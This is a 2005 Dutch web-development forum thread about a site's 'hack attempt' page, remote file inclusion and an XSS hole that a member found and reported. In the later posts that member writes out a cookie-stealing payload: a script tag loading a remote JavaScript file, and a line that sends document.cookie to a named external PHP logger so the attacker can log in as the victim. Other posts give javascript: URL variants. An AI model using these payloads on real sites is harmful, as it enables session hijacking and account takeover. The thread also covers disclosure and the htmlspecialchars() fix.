login  Naam:   Wachtwoord: 
Registreer je!
 Forum

Mislukte hackpoging :cool: ???

Offline gijs - 15/06/2005 21:33
Avatar van gijsHTML beginner Ik keek even bij alle bezoekers die online waren, en bij 1 bezoeker stond er 'Mislukte hackpoging 

Is dit gewoon een lolletje van dat 'wat-doen-de bezoekers-script' of is dit een soort van stoute bezoeker. 

35 antwoorden

Gesponsorde links
Offline Tuinstoel - 15/06/2005 21:35
Avatar van Tuinstoel PHP expert Is gewoon een geintje van Murfy die dat er - als het goed is - heeft ingebouwd. Is gewoon iemand die een remote pagina wil includen .
Offline Voldemort - 15/06/2005 21:37 (laatste wijziging 15/06/2005 21:37)
Avatar van Voldemort PHP ver gevorderde Wat is een remote pagina?

Ik heb dit eens naar Joël gePB't omdat ik er 3 zag. Zal mij nu wel onozel vinden .
Offline nemesiskoen - 15/06/2005 22:07
Avatar van nemesiskoen Gouden medaille

PHP expert
komt dagelijks vrij veel voor
bv nu zelfs:)

een remote pagina is een pagina waarop jij acties wilt uitvoeren via jou site op deze site (kraken!)

cross side scripting -> xss
Offline Frederic - 15/06/2005 22:12
Avatar van Frederic PHP ver gevorderde Soms staat er bij gasten echt een rare pagina:
op dit moment bvb:

/index.php?action=php
Offline Scott - 16/06/2005 10:06
Avatar van Scott Gouden medaille

PHP ver gevorderde
Lol 

Citaat:
HACK POGING!

De pagina kan niet worden weergegeven omdat iemand zo zwak is om een hackpoging te ondernemen door een extern bestand te includen.

Het ziet er naar uit dat u een groot gedacht van uzelf hebt. Gelukkig hebben wij nog een groter gedacht over onszelf, kunt u het nu wel vergeten.
Ohja, voor we het vergeten: uw hackpoging is dus bij deze mislukt. Get a life.

Uw ip is gelogd en wordt zo snel mogelijk doorgegeven aan alle grote PHP websites voor een ban. U kunt zich het best melden bij de plaatselijke bevolkingsdienst/mafia voor een andere indentiteit. Als u deze stap niet onderneemt leeft u best de rest van uw dagen ondergedoken.

Nog een prettige dag verder,
Sitemasters.be
Offline vinTage - 16/06/2005 10:13
Avatar van vinTage Nieuw lid allemaal even zelf kijken dan^^
Offline Stijn - 16/06/2005 13:57
Avatar van Stijn PHP expert ^^ grappig gevonden 
Offline Dennis - 16/06/2005 14:25
Avatar van Dennis Gouden medaille

Grafische expert
lol, heeft Murfy het nog druk, aangezien het ID wordt opgeslagen. 
Offline prorsoft - 16/06/2005 14:45 (laatste wijziging 16/06/2005 14:46)
Avatar van prorsoft PHP gevorderde
Citaat:
melden bij de plaatselijke bevolkingsdienst/mafia voor een andere indentiteit

  1. L(_)L
Offline Legolas - 16/06/2005 15:36
Avatar van Legolas Onbekend
Citaat:
Als u deze stap niet onderneemt leeft u best de rest van uw dagen ondergedoken.

in een doos:cool:
Offline remcobers - 16/06/2005 15:41
Avatar van remcobers PHP expert lol. Leuke tekst
Offline BigBug - 16/06/2005 17:17
Avatar van BigBug PHP expert Haha, lolz0r, nu weet ik cker dat Murfy dat heeft gemaakt 
Offline Steven - 16/06/2005 17:29
Avatar van Steven HTML interesse :p , dat zag ik laatst ook, maar ik dacht dat het te maken had, dat iemand probeerde in te loggen met een fout wachtwoord en of username ofzo... 
Offline remy - 16/06/2005 17:45 (laatste wijziging 16/06/2005 17:46)
Avatar van remy PHP ver gevorderde dat krijg je toch als je zoiets include?

http://www.sitemasters.be/?pagina=www.eensite.nl
Offline ece - 16/06/2005 17:46
Avatar van ece HTML interesse Ja een leuke tekst:p.
Offline Frederic - 16/06/2005 18:16
Avatar van Frederic PHP ver gevorderde
Citaat:
dat krijg je toch als je zoiets include?

http://www.sitemasters.be/?pagina=www.eensite.nl

Nee joh, juist andersom!

http://www.mijn...masters.be
Offline leendertW - 16/06/2005 18:26
Avatar van leendertW PHP beginner
Citaat:
Nee joh, juist andersom!

http://www.mijn...masters.be


Zo kan het ook hoor
http://www.sitemasters.be/?pagina=http://www.nu.nl

Offline haytjes - 16/06/2005 18:37
Avatar van haytjes Gouden medailleGouden medaille

JS gevorderde
sorry was ik,

heb de xss al gemeld,
want je kan het wel degelijk XSS toepassen.

Gisteren al 1 in print.php gevonden,
heb het gemeld en het is al opgelost.
Vlugge reactie van Joël (goe man).

En nog maar net een nieuwe gevonden,
ook doorgestuurd naar Joël, maar hij is nog niet online

groetjes
Offline Scott - 16/06/2005 20:45
Avatar van Scott Gouden medaille

PHP ver gevorderde
Mag ik weten wat je deed en wat je er mee kon ? Als het toch al opgelost is.. 
Offline haytjes - 16/06/2005 21:56
Avatar van haytjes Gouden medailleGouden medaille

JS gevorderde
ik kon <script src=http://www.voorbeeld.be/log.js></script> erin steken

en ik kon dan in log.js een script steken die je cookie gaat gaan zoeken en opstuurt naar mij, zodat ik kon inloggen als jij
Offline haytjes - 17/06/2005 14:18
Avatar van haytjes Gouden medailleGouden medaille

JS gevorderde
nu krijg je de link: (want nu lukt het langs geen kanten meer^^ )

http://www.site...test.js%3E

en dan werd je cookie gealert.
Offline leendertW - 17/06/2005 15:31
Avatar van leendertW PHP beginner Wat zette je in test.js ?
Offline haytjes - 17/06/2005 15:42
Avatar van haytjes Gouden medailleGouden medaille

JS gevorderde
  1. alert(document.cookie);

voor te testen, maar je zou bv. kunnen zetten:

  1. document.location = "http://www.alasal.be/hack/logt.php?cookie=" + document.cookie;

en dan in logt.php $_GET['cookie'] schrijven in een bestand en later met proxomitron dan 'inloggen'
Offline Dennis - 17/06/2005 15:53
Avatar van Dennis Gouden medaille

Grafische expert
Dit lek zat pas geleden ook bij MSN.
Hierdoor was het mogelijk om iemand zijn mail/instellingen te lezen.

Maar ook de webmail van de providers zijn slecht...
Offline leendertW - 17/06/2005 16:02
Avatar van leendertW PHP beginner Ja net zo als dat je dit in je url kan zetten:
javascript:alert(document.cookie)
Offline prorsoft - 17/06/2005 16:13 (laatste wijziging 17/06/2005 16:53)
Avatar van prorsoft PHP gevorderde http://www.sitemasters.be/?pagina=javascript:alert(document.cookie);
werkt niet^^


Maar dit:
http://www.site...ript:alert(document.cookie);

dan zetie in de titelbalk: Hackpoging; en de pagina die ie weergeeft is een 404 pagina!:s
Offline nemesiskoen - 17/06/2005 17:34
Avatar van nemesiskoen Gouden medaille

PHP expert
omdat er http in staat wordt het geblokeerd (xss)
en javascript wordt hoogstwss gewoon genegeerd
Offline haytjes - 17/06/2005 18:05
Avatar van haytjes Gouden medailleGouden medaille

JS gevorderde
't heeft niet alleen met http te maken hoor

http://www.site...t>alert(document.cookie)</script>

werkt nu ook niet meer, wat voorheen wel werkte
Offline freddyboeke - 17/06/2005 23:04
Avatar van freddyboeke HTML beginner en hoe kan je je daar nu tegen beveiligen? en hoe spoor je dat op? (dit is wel een intressant onderwerp)
Offline MothZone - 17/06/2005 23:09
Avatar van MothZone PHP ver gevorderde bij het includen van een get-superglobal er eerst htmlspecialchars() op uitvoeren
Gesponsorde links
Dit onderwerp is gesloten.
Actieve forumberichten
© 2002-2024 Sitemasters.be - Regels - Laadtijd: 0.258s